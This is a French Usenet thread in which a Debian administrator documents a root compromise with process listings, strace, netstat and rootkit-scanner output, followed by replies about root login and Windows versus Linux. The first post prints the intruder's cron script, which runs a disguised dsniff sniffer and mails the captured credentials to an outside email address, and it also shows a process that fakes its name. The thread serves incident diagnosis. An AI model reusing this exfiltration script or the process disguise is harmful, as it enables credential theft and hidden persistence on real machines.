OVH Cloud OVH Cloud

Je suis roote que faire ?

15 réponses
Avatar
contact
Je me suis apercu que ma debian s'etait fait rooter :(. J'ai amassé
quelques preuves :

tout d'abord j'ai touvé dans le repertoire /home/client des fichiers
permettant de se connecter a
ebay via lynx .... ayant les droits root :| (cela m'a mis la puce a
l'oreille)

J'ai commencé à chercher :

il y a un faux syslogd qui s'appelle en réalité syslogd{ESPACE} qui
tourne :

----------------------------------------------------
leguenr@buroplan:/etc/rc1.d$ ps -eaf
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 17:34 ? 00:00:04 init [2]
root 2 1 0 17:34 ? 00:00:00 [kflushd]
root 3 1 0 17:34 ? 00:00:00 [kupdate]
root 4 1 0 17:34 ? 00:00:09 [kswapd]
root 5 1 0 17:34 ? 00:00:00 [keventd]
daemon 108 1 0 17:34 ? 00:00:00 /sbin/portmap
root 132 1 0 17:34 ? 00:00:00 udevd syslogd
**?*.*??*???? !!!
root 206 1 0 17:34 ? 00:00:00 /sbin/syslogd
root 209 1 0 17:34 ? 00:00:00 [klogd]
root 213 1 0 17:34 ? 00:00:00 /usr/sbin/named
root 216 1 0 17:34 ? 00:00:00 /usr/sbin/lwresd
-----------------------------------------------------

le pstree le montre bien en m'affichant :

------------
syslogd
syslogd\040
------------

lorsque je le lance en tant que simple user :

--------------------------------------
leguenr@buroplan:/etc/rc1.d$ "/sbin/syslogd "
[sebd]-> starting
error: you need to be root (your uid: 1001) to run me
--------------------------------------

en root :

--------------------------------------
leguenr@buroplan:/etc/rc1.d$ sudo "/sbin/syslogd "
[sebd]-> starting
[sebd]-> checking uid...OK (uid=0)
[sebd]-> Killing pid: 132
[sebd]-> forking...OK (pid=14920)
[sebd]-> writing pid file..OK (/usr/share/pci.r)
[sebd]-> faking the proccess name..OK (udevd)
--------------------------------------


en faisant un strace sur le fichier j'obtiens :

--------------------------------------
.....
socket(PF_INET, SOCK_RAW, IPPROTO_TCP) = 3
fork() = 14925
brk(0) = 0x8055084
brk(0x8076084) = 0x8076084
brk(0) = 0x8076084
brk(0x8077000) = 0x8077000
open("/usr/share/pci.r", O_RDONLY) = 4
fstat(4, {st_mode=S_IFREG|0644, st_size=6, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) = 0x40019000
read(4, "14920\n", 4096) = 6
write(1, "[sebd]-> Killing pid: 14920\n", 28[sebd]-> Killing pid: 14920
) = 28
kill(14920, SIGKILL) = 0
.....
-----------------------------------------

en faisant un netstat -an je trouve ca :

--------------------------------------------------
leguenr@buroplan:~$ sudo netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address
State PID/Program name
tcp 0 288 10.0.0.5:22 195.221.228.2:59372
ESTABLISHED14932/sshd: leguenr
tcp 0 0 10.0.0.5:53 0.0.0.0:*
LISTEN 213/named
tcp 0 0 10.0.0.5:139 10.0.0.7:4889
ESTABLISHED2907/smbd
tcp 0 0 0.0.0.0:670 0.0.0.0:*
LISTEN 912/rpc.statd
tcp 0 0 0.0.0.0:22 0.0.0.0:*
LISTEN 883/sshd
tcp 0 0 127.0.0.1:3306 0.0.0.0:*
LISTEN 421/mysqld
tcp 0 0 0.0.0.0:25 0.0.0.0:*
LISTEN 276/exim3
tcp 0 0 0.0.0.0:20012 0.0.0.0:*
LISTEN 282/
tcp 0 0 0.0.0.0:139 0.0.0.0:*
LISTEN 240/smbd
tcp 0 0 127.0.0.1:953 0.0.0.0:*
LISTEN 213/named
tcp 0 0 127.0.0.1:53 0.0.0.0:*
LISTEN 213/named
tcp 0 0 0.0.0.0:111 0.0.0.0:*
LISTEN 108/portmap
udp 0 0 10.0.0.5:53 0.0.0.0:*
213/named
udp 0 0 127.0.0.1:1026 0.0.0.0:*
2907/smbd
udp 0 0 10.0.0.5:138 0.0.0.0:*
236/nmbd
udp 0 0 10.0.0.5:137 0.0.0.0:*
236/nmbd
udp 0 0 0.0.0.0:667 0.0.0.0:*
912/rpc.statd
udp 0 0 0.0.0.0:664 0.0.0.0:*
912/rpc.statd
udp 0 0 0.0.0.0:68 0.0.0.0:*
266/dhclient
udp 0 0 127.0.0.1:921 0.0.0.0:*
216/lwresd
udp 0 0 0.0.0.0:138 0.0.0.0:*
236/nmbd
udp 0 0 0.0.0.0:137 0.0.0.0:*
236/nmbd
udp 0 0 0.0.0.0:1025 0.0.0.0:*
216/lwresd
udp 0 0 0.0.0.0:1024 0.0.0.0:*
213/named
udp 0 0 127.0.0.1:53 0.0.0.0:*
213/named
udp 0 0 0.0.0.0:111 0.0.0.0:*
108/portmap
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
14925/udevd ****** me parait louche
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
-
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
-
Active UNIX domain sockets (servers and established)
---------------------------------------------------------------


le fichier pci.r contient :

-------------------------------
leguenr@buroplan:~$ cat /usr/share/pci.r
14925
-------------------------------

un pid visiblement ...

j'ai passé chkrootkit : tout ok sauf :

--------------------------------------------------
Checking `lkm'... You have 2 process hidden for readdir command
You have 2 process hidden for ps command
Warning: Possible LKM Trojan installed
--------------------------------------------------

passage de rkhunter -> tout ok ! sauf :

--------------------------------------
* Application version scan
- Exim MTA 3.36 [ Unknown
]
- GnuPG 1.0.6 [ Old or
patched version ]
- Bind DNS 9.2.1 [ Unknown
]
- OpenSSL 0.9.7e [ OK ]
- Procmail MTA 3.22 [ OK ]
- OpenSSH 3.8.1p1 [ OK ]
--------------------------------------

J'ai aussi trouvé : un cron dans /etc/cron.daily/dnsquery
ce fichier contenait :

--------------------------------------
root@buroplan:/root# cat dnsquery
#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail dumycs@yahoo.com -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
---------------------------------------

pour information le fichier popauth en question etait un dsniff
le repertoir /usr/share/misc n'existe pas du moins pas vu de mon ls
il y'a pê un rootkit qui masque ce repertoire.

J'en suis la, j'ai killé les processus syslogd{ESPACE} et je l'ai
effacé mais
il est réapparu apres avoir rebooté. J'ai tenté de faire un
rapprochement
sur les dates de modification des fichiers mais il semblerait que
celles ci ait été modifiées.

J'ai retrouvé popauth et dnsquery avec comme user et group : 501.
cela m'a permit de faire un "find / -gid 501" pour trouver ces indices
! Bref,

Que dois-je faire ? La reinstallation complete n'est pas possible, du
moins pas pour l'instant
car je n'ai acces à cette machine que par ssh. Les données
compromises n'ont pas grande valeur
mais j'aimerai bien en savoir plus sur le comment !

Merci d'avance pour les informations que vous pourriez eventuellement
me donner :)

Romain Le Guen

5 réponses

1 2
Avatar
Michoko

ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)



Mes tests depuis plusieurs mois sous Debian testing me disent le
contraire :-)
Sous Debian je n'ai bien sûr pas d'antivirus, n'ai même pas encore
configuré iptables (je sais, c'est pas bien) et je n'ai encore eu aucun
soucis sur Internet. Une telle configuration est impensable sous
Windows, car dès la connexion établie j'attraperais de graves saloperies.

Michoko

Avatar
JF Pion
Michoko wrote:

pas de connexion en root


Pourquoi ?


parce que si tu te fait pirater à se momnet là le pirate a tous les
droits


--
jf Pion
No Neurone Inside
des montages et liens modélistes :http://jean.francois.pion.free.fr/
l'électrique en avion rc : http://electrofly.free.fr/


Avatar
Noshi
On 04 Dec 2005 14:59:05 GMT, Michoko wrote:


ouhlàlàlàlà ! restez sous Windows. C'est beaucoup moins risqué ;-)


Mes tests depuis plusieurs mois sous Debian testing me disent le
contraire :-)
Sous Debian je n'ai bien sûr pas d'antivirus, n'ai même pas encore
configuré iptables (je sais, c'est pas bien) et je n'ai encore eu aucun
soucis sur Internet. Une telle configuration est impensable sous
Windows, car dès la connexion établie j'attraperais de graves saloperies.


Non. A partir du moment ou on installe un XP sp2 le firewall est actif sur
les interfaces réseau, le système de mise a jour signale qu'il serait bien
de le mettre en automatique. Déjà ces deux choses font que la machine est
"mieux" protégée qu'avant. Ensuite en utilisant d'autres programmes que
IE/OE (bien que maintenant on arrive a un bon niveau de sécurité avec les
patch), et bien on descend le risque d'attraper une saloperie. Si on ajoute
du safe hex. Le risque devient quasi nul. Y compris sans antivirus.

Michoko


Cordialement,

Noshi


Avatar
Fabien LE LEZ
On 04 Dec 2005 17:36:24 GMT, (Xavier):

pas de connexion en root


Pourquoi ?


J'avoue que je suis moi aussi perplexe. SSH v2 est censé éviter le
problème du man in the middle.
Par contre, d'une manière générale, il y a rarement une raison valable
de se connecter en root, donc l'interdiction d'une telle connexion
peut être classée dans les règles à suivre pour le principe de
précaution, sans que ça soit gênant.


Avatar
Cedric Blancher
Le Mon, 05 Dec 2005 20:06:51 +0000, Xavier a écrit :
Mpffft :-) Ceux qui disent ça tapent en général sudo comme première
commande....


Ce qui présente un intérêt dès lors qu'on a plus d'une personne en
possession de droits superutilisateur (et pas forcément tous).


--
72 fufeurs font un séminaire sur un plateau du Cantal (les 54
habitués plus 18 sympathisants). Un pompier passant par hasard
entend les discussions et conclut à une insolation générale.
-+- JR in: Guide du Cabaliste Usenet - Chauffe, Marcel ! -+-

1 2